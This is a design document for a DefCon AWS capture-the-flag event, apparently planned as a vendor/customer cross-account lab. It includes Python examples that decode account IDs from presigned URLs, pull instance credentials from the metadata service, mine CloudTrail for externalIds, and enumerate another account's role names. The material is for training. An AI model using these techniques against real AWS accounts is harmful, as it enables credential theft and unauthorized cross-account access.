Design to support the following DefCon CTF
Minimal
Need two empty AWS accounts.
Vendor Account has a server running
EC2 vs Serverless vs Lightsail / Elastic Beanstalk. EC2 is the more common choice and gives us the SSRF-to-instance-metadata (IMDS) attack path.
ASG behind ELB behind WAF
Maximal
Base the vendor portal on Panther (Panther Labs). Will it allow user isolation and quick customizations?
https://github.com/panther-labs/panther/issues
Challenge 1: Standard Attack - Trivial
Description: Web portal. Instructions on how to use Pacu to solve.
Recon: You are given an account ID. Brute force role names in that account with Pacu (iam__enum_roles).
Attack: Access the vendor portal. Supply the accountID and role.
Challenge 2: Direct Access to Resource - Easy
Description: Website url with some suggested pages to visit. Observe the web traffic. Hint that the Account ID can be extracted from a signed URL.
Recon: The website hands out a signed (SigV4 presigned) S3 URL. The access key ID in its X-Amz-Credential parameter encodes the AWS account ID; decode it, then use Pacu to brute force role names to find the vendor role(s).
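The Challenge 2 recon step in code, as an added example (not part of this issue and not a Pacu module): pull the access key ID out of a presigned URL's X-Amz-Credential parameter and decode the account ID from it. The presigned URL, bucket and object below are constructed; the key ID is the test vector from the public write-up of this decode trick, not a live credential. The offline decode is a community-documented technique; the official route is `aws sts get-access-key-info --access-key-id <key>`.

```python
"""Recover the AWS account ID from the access key embedded in an S3 presigned URL.

Added example, constructed for this write-up. Works for AKIA (long-term) and
ASIA (temporary) key IDs; both encode the account ID the same way.
"""
import base64
from urllib.parse import parse_qs, urlparse

# Constructed presigned URL. The key ID is a public test vector, not a real key.
SAMPLE_URL = (
    "https://vendor-reports.s3.us-east-1.amazonaws.com/reports/q1.pdf"
    "?X-Amz-Algorithm=AWS4-HMAC-SHA256"
    "&X-Amz-Credential=AKIASP2TPHJSQH3FJXYZ%2F20240101%2Fus-east-1%2Fs3%2Faws4_request"
    "&X-Amz-Date=20240101T000000Z&X-Amz-Expires=3600"
    "&X-Amz-SignedHeaders=host&X-Amz-Signature=deadbeef"
)


def access_key_from_presigned_url(url: str) -> str:
    """X-Amz-Credential is <keyid>/<date>/<region>/<service>/aws4_request."""
    qs = parse_qs(urlparse(url).query)   # parse_qs also URL-decodes the %2F
    cred = qs.get("X-Amz-Credential")
    if not cred:
        raise ValueError("not a SigV4 presigned URL: no X-Amz-Credential")
    return cred[0].split("/")[0]


def account_id_from_access_key(key_id: str) -> str:
    """Decode the 12-digit account ID packed into the key ID after its 4-char prefix."""
    if len(key_id) != 20 or key_id[:4] not in ("AKIA", "ASIA"):
        raise ValueError("unexpected access key ID format")
    raw = base64.b32decode(key_id[4:])        # 16 base32 chars -> 10 bytes
    n = int.from_bytes(raw[:6], "big")        # account ID sits in the top bits
    return f"{(n & 0x7FFFFFFFFF80) >> 7:012d}"


def account_id_from_presigned_url(url: str) -> str:
    return account_id_from_access_key(access_key_from_presigned_url(url))


if __name__ == "__main__":
    print(account_id_from_presigned_url(SAMPLE_URL))  # 171436882533
```

With the account ID in hand the rest of the challenge is the same as Challenge 1: role-name brute force against that account.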
Challenge 3: Tamper POST request - Medium
Recon: Foothold on a container instance. Call the metadata service to get the instance credentials. Read the CloudTrail logs / CloudWatch Events for the vendor's AssumeRole calls to get the externalId.
Attack: The vendor portal UI does not let you edit the externalId. Use Burp to intercept the POST and change it to the discovered value.
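Both Challenge 3 recon steps in code, as an added example (not part of this issue): fetch credentials from the instance metadata service, then pull the vendor's externalId out of CloudTrail AssumeRole records. Every cross-account sts:AssumeRole the vendor performs into the customer account is logged with requestParameters.roleArn and requestParameters.externalId. The CloudTrail records, account IDs, ARNs and externalId below are constructed; a real run reads records from the trail's S3 bucket or `aws cloudtrail lookup-events`. The IMDS fetcher is IMDSv2 (token first); an SSRF against IMDSv1 is just the plain GETs without the PUT. On ECS the endpoint is http://169.254.170.2 plus $AWS_CONTAINER_CREDENTIALS_RELATIVE_URI instead.

```python
"""Challenge 3 recon: metadata credentials, then the vendor's externalId from CloudTrail.

Added example, constructed for this write-up; not the CTF's own code.
"""
import json
from urllib.request import Request, urlopen

IMDS = "http://169.254.169.254"


def imds_credentials(base=IMDS, timeout=2):
    """Return the instance role's temporary credentials via IMDSv2."""
    token = urlopen(Request(f"{base}/latest/api/token", method="PUT",
                            headers={"X-aws-ec2-metadata-token-ttl-seconds": "60"}),
                    timeout=timeout).read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    path = f"{base}/latest/meta-data/iam/security-credentials/"
    role = urlopen(Request(path, headers=hdr), timeout=timeout).read().decode().strip()
    body = urlopen(Request(path + role, headers=hdr), timeout=timeout).read()
    return json.loads(body)   # AccessKeyId, SecretAccessKey, Token, Expiration


# Constructed CloudTrail export: one vendor AssumeRole carrying an externalId,
# one in-account service AssumeRole without one, one unrelated S3 event.
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
     "userIdentity": {"type": "AssumedRole", "accountId": "222222222222"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::111111111111:role/VendorIntegrationRole",
         "roleSessionName": "vendor-scan",
         "externalId": "ctf-ext-8f3a2c"}},
    {"eventSource": "sts.amazonaws.com", "eventName": "AssumeRole",
     "userIdentity": {"type": "AWSService", "invokedBy": "ec2.amazonaws.com"},
     "requestParameters": {
         "roleArn": "arn:aws:iam::111111111111:role/AppInstanceRole",
         "roleSessionName": "i-0abc123"}},
    {"eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "requestParameters": {"bucketName": "vendor-reports", "key": "q1.pdf"}},
]})


def cross_account_assumes(records_json):
    """AssumeRole events that carried an externalId: roleArn, caller account, externalId."""
    hits = []
    for rec in json.loads(records_json).get("Records", []):
        if rec.get("eventSource") != "sts.amazonaws.com" or rec.get("eventName") != "AssumeRole":
            continue
        params = rec.get("requestParameters") or {}
        if not params.get("externalId"):
            continue   # ExternalId only appears on vendor-style cross-account assumes
        hits.append({
            "roleArn": params.get("roleArn"),
            "callerAccount": rec.get("userIdentity", {}).get("accountId"),
            "externalId": params["externalId"],
        })
    return hits


def external_id_for(records_json, role_arn):
    """The externalId to put in the tampered portal POST for role_arn, or None."""
    for hit in cross_account_assumes(records_json):
        if hit["roleArn"] == role_arn:
            return hit["externalId"]
    return None


if __name__ == "__main__":
    for hit in cross_account_assumes(SAMPLE_CLOUDTRAIL):
        print(hit)
```

The flaw the challenge models is that the vendor portal accepts the externalId from the client request at all. The ExternalId exists to stop the confused deputy, so the vendor must generate it per customer and never let a portal user set it; once it is a POST field, anyone who has read the customer's CloudTrail can replay it.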
Challenge 4: Attack the vendor - Hard
Recon: Hint - you are attacking the vendor's AWS cloud, but you will still need to use the Client portal to discover something about the vendor.
Attack: Up to you. This is the nuclear variation; no hints.
Infrastructure supplied by dungeonmaster
Two AWS accounts: Vendor and Customer.
Hackers will each receive credentials for a single unique role whose trust policy they have permission to modify (this is what Pacu's role enumeration needs). Scope that iam:UpdateAssumeRolePolicy permission to the player's own role so players cannot touch each other's roles.
The permission policy of the role will allow them to read the unique CTF secret from an S3 bucket to prove their success.
Hackers will also be able to self register at the vendor portal.
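The role-name brute force used in Challenges 1 and 2, and the reason each player gets a role whose trust policy they may modify, as an added example (not part of this issue and not Pacu's own code): IAM validates every Principal ARN in an assume-role policy document, so setting your own role's trust policy to trust arn:aws:iam::<target>:role/<guess> succeeds only if that role exists and otherwise fails with MalformedPolicyDocument. The role name, wordlist and account IDs below are constructed. The function only needs an object with an IAM-style update_assume_role_policy method, so a FakeIAM stand-in replaces boto3.client('iam') to keep the example offline.

```python
"""Enumerate role names in another account via trust-policy validation (Pacu's iam__enum_roles idea).

Added example, constructed for this write-up; swap FAKE_IAM for boto3.client("iam") for a real run.
"""
import json


def trust_policy_for(principal_arn):
    """Minimal trust policy naming one principal."""
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{"Effect": "Allow",
                       "Principal": {"AWS": principal_arn},
                       "Action": "sts:AssumeRole"}],
    })


def _is_malformed_policy(exc):
    # botocore.exceptions.ClientError exposes the AWS error code on .response
    resp = getattr(exc, "response", None) or {}
    return resp.get("Error", {}).get("Code") == "MalformedPolicyDocument"


def enum_roles(iam, own_role, target_account, candidates, restore_to=None):
    """Return the candidate role names that exist in target_account.

    Every probe overwrites own_role's trust policy, so pass the original
    document as restore_to and it is put back in the finally block.
    """
    found = []
    try:
        for name in candidates:
            arn = f"arn:aws:iam::{target_account}:role/{name}"
            try:
                iam.update_assume_role_policy(RoleName=own_role,
                                              PolicyDocument=trust_policy_for(arn))
                found.append(name)          # IAM accepted the principal: role exists
            except Exception as exc:
                if not _is_malformed_policy(exc):
                    raise                   # throttling, AccessDenied: don't mask real failures
    finally:
        if restore_to is not None:
            iam.update_assume_role_policy(RoleName=own_role, PolicyDocument=restore_to)
    return found


class _FakeClientError(Exception):
    def __init__(self, code):
        super().__init__(code)
        self.response = {"Error": {"Code": code}}


class FakeIAM:
    """Offline stand-in for boto3's IAM client (constructed for this example)."""
    def __init__(self, existing_role_arns):
        self.existing = set(existing_role_arns)
        self.last_policy = None

    def update_assume_role_policy(self, RoleName, PolicyDocument):
        principal = json.loads(PolicyDocument)["Statement"][0]["Principal"]["AWS"]
        if ":role/" in principal and principal not in self.existing:
            raise _FakeClientError("MalformedPolicyDocument")   # what real IAM returns
        self.last_policy = PolicyDocument


ORIGINAL_TRUST = trust_policy_for("arn:aws:iam::111111111111:root")
FAKE_IAM = FakeIAM({"arn:aws:iam::222222222222:role/VendorAccessRole"})
WORDLIST = ["admin", "VendorAccessRole", "CrossAccountReadOnly"]

if __name__ == "__main__":
    # Real run: iam = boto3.client("iam"); restore_to = json.dumps(
    #     iam.get_role(RoleName="ctf-player-role")["Role"]["AssumeRolePolicyDocument"])
    print(enum_roles(FAKE_IAM, "ctf-player-role", "222222222222", WORDLIST,
                     restore_to=ORIGINAL_TRUST))   # ['VendorAccessRole']
```

Each probe is an UpdateAssumeRolePolicy event in the player's own account only; the target account sees nothing, which is why the technique works against the customer account without tripping its CloudTrail.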
Requirements for hackers
Hackers are encouraged to run Pacu in Docker, but it can also be installed with pip.
For Challenges 3 and 4, hackers will need an intercepting proxy like Burp.